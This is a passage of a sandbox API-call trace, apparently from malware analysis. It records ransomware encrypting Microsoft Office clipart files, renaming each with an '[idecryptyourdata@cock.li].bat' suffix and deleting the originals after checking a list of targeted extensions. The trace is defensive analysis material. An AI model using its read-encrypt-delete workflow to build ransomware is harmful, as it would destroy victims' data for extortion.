Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.998] lstrlenW (lpString=".zip") returned 4 [0184.998] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.998] lstrlenW (lpString=".rar") returned 4 [0184.998] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString=".bz2") returned 4 [0184.998] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString=".7z") returned 3 [0184.998] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.998] lstrlenW (lpString=".dbf") returned 4 [0184.998] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.998] lstrlenW (lpString=".1cd") returned 4 [0184.998] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.998] lstrlenW (lpString=".jpg") returned 4 [0184.998] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.999] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.999] lstrlenW (lpString="J0107734.WMF") returned 12 [0184.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0184.999] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=3140) returned 1 [0184.999] CloseHandle (hObject=0x388) returned 1 [0184.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf")) returned 0x220 [0184.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.000] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.000] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0185.001] GetLastError () returned 0x0 [0185.001] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xc44, lpOverlapped=0x0) returned 1 [0185.010] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xc50, lpOverlapped=0x0) returned 1 [0185.012] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0185.012] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0185.012] SetEndOfFile (hFile=0x360) returned 1 [0185.012] CloseHandle (hObject=0x360) returned 1 [0185.012] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.012] SetEndOfFile (hFile=0x388) returned 1 [0185.013] CloseHandle (hObject=0x388) returned 1 [0185.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf")) returned 1 [0185.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.014] lstrlenW (lpString=".doc") returned 4 [0185.014] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.014] lstrlenW (lpString=".docx") returned 5 [0185.014] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.014] lstrlenW (lpString=".pdf") returned 4 [0185.014] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.014] lstrlenW (lpString=".xls") returned 4 [0185.014] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.014] lstrlenW (lpString=".xlsx") returned 5 [0185.014] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.014] lstrlenW (lpString=".ppt") returned 4 [0185.014] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.014] lstrlenW (lpString=".zip") returned 4 [0185.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.014] lstrlenW (lpString=".rar") returned 4 [0185.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString=".bz2") returned 4 [0185.015] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString=".7z") returned 3 [0185.015] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString=".dbf") returned 4 [0185.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString=".1cd") returned 4 [0185.015] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString=".jpg") returned 4 [0185.015] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString=".doc") returned 4 [0185.015] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString=".docx") returned 5 [0185.015] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.015] lstrlenW (lpString=".pdf") returned 4 [0185.015] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString=".xls") returned 4 [0185.015] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.015] lstrlenW (lpString=".xlsx") returned 5 [0185.015] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.015] lstrlenW (lpString=".ppt") returned 4 [0185.015] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.015] lstrlenW (lpString=".zip") returned 4 [0185.016] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.016] lstrlenW (lpString=".rar") returned 4 [0185.016] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.016] lstrlenW (lpString=".bz2") returned 4 [0185.016] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.016] lstrlenW (lpString=".7z") returned 3 [0185.016] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.016] lstrlenW (lpString=".dbf") returned 4 [0185.016] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.016] lstrlenW (lpString=".1cd") returned 4 [0185.016] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF") returned 68 [0185.016] lstrlenW (lpString=".jpg") returned 4 [0185.016] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.016] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0185.016] lstrlenW (lpString="J0107744.WMF") returned 12 [0185.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.017] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=5004) returned 1 [0185.017] CloseHandle (hObject=0x388) returned 1 [0185.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf")) returned 0x220 [0185.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.017] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.017] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0185.018] GetLastError () returned 0x0 [0185.018] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x138c, lpOverlapped=0x0) returned 1 [0185.028] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1390, lpOverlapped=0x0) returned 1 [0185.030] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0185.030] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0185.030] SetEndOfFile (hFile=0x360) returned 1 [0185.030] CloseHandle (hObject=0x360) returned 1 [0185.030] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.030] SetEndOfFile (hFile=0x388) returned 1 [0185.031] CloseHandle (hObject=0x388) returned 1 [0185.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf")) returned 1 [0185.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.032] lstrlenW (lpString=".doc") returned 4 [0185.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.032] lstrlenW (lpString=".docx") returned 5 [0185.032] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.032] lstrlenW (lpString=".pdf") returned 4 [0185.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.032] lstrlenW (lpString=".xls") returned 4 [0185.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.032] lstrlenW (lpString=".xlsx") returned 5 [0185.032] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.032] lstrlenW (lpString=".ppt") returned 4 [0185.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.032] lstrlenW (lpString=".zip") returned 4 [0185.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.032] lstrlenW (lpString=".rar") returned 4 [0185.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString=".bz2") returned 4 [0185.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString=".7z") returned 3 [0185.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.033] lstrlenW (lpString=".dbf") returned 4 [0185.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.033] lstrlenW (lpString=".1cd") returned 4 [0185.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.033] lstrlenW (lpString=".jpg") returned 4 [0185.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.033] lstrlenW (lpString=".doc") returned 4 [0185.033] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString=".docx") returned 5 [0185.033] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0185.033] lstrlenW (lpString=".pdf") returned 4 [0185.033] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.033] lstrlenW (lpString=".xls") returned 4 [0185.033] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.033] lstrlenW (lpString=".xlsx") returned 5 [0185.033] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0185.033] lstrlenW (lpString=".ppt") returned 4 [0185.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.034] lstrlenW (lpString=".zip") returned 4 [0185.034] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.034] lstrlenW (lpString=".rar") returned 4 [0185.034] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.034] lstrlenW (lpString=".bz2") returned 4 [0185.034] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.034] lstrlenW (lpString=".7z") returned 3 [0185.034] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.034] lstrlenW (lpString=".dbf") returned 4 [0185.034] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.034] lstrlenW (lpString=".1cd") returned 4 [0185.034] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF") returned 68 [0185.034] lstrlenW (lpString=".jpg") returned 4 [0185.034] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.034] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0185.034] lstrlenW (lpString="J0107748.WMF") returned 12 [0185.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.035] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=8224) returned 1 [0185.035] CloseHandle (hObject=0x388) returned 1 [0185.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf")) returned 0x220 [0185.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0185.035] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.036] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0185.036] GetLastError () returned 0x0 [0185.036] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2020, lpOverlapped=0x0) returned 1 [0185.379] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2030, lpOverlapped=0x0) returned 1 [0185.380] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0185.380] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0185.380] SetEndOfFile (hFile=0x360) returned 1 [0185.381] CloseHandle (hObject=0x360) returned 1 [0185.381] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0185.381] SetEndOfFile (hFile=0x388) returned 1 [0185.382] CloseHandle (hObject=0x388) returned 1 [0185.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf")) returned 1 [0185.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.382] lstrlenW (lpString=".doc") returned 4 [0185.382] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.382] lstrlenW (lpString=".docx") returned 5 [0185.382] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0185.382] lstrlenW (lpString=".pdf") returned 4 [0185.382] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.382] lstrlenW (lpString=".xls") returned 4 [0185.382] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.382] lstrlenW (lpString=".xlsx") returned 5 [0185.382] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0185.382] lstrlenW (lpString=".ppt") returned 4 [0185.382] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString=".zip") returned 4 [0185.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.383] lstrlenW (lpString=".rar") returned 4 [0185.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString=".bz2") returned 4 [0185.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString=".7z") returned 3 [0185.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString=".dbf") returned 4 [0185.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString=".1cd") returned 4 [0185.383] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString=".jpg") returned 4 [0185.383] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.383] lstrlenW (lpString=".doc") returned 4 [0185.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.383] lstrlenW (lpString=".docx") returned 5 [0185.383] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0185.383] lstrlenW (lpString=".pdf") returned 4 [0185.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString=".xls") returned 4 [0185.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.384] lstrlenW (lpString=".xlsx") returned 5 [0185.384] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0185.384] lstrlenW (lpString=".ppt") returned 4 [0185.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF") returned 68 [0185.384] lstrlenW (lpString=".zip") returned 4 [0185.384] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.384] lstrlenW (lpString=".rar") returned 4 [0185.384] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString=".bz2") returned 4 [0185.384] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.384] lstrlenW (lpString=".7z") returned 3 [0185.384] lstrcmpiW (lpString1=".7z", 